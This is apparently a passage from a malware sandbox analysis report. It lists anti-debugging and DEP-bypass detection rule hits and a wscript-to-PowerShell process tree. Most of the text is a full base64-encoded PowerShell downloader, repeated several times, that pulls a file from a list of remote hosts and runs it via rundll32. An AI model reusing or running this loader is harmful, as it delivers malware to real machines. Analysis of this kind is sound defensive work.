ZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA=" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | wscript "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates | ||||||
parent_process | wscript.exe | martian_process | powershell -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA=" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuA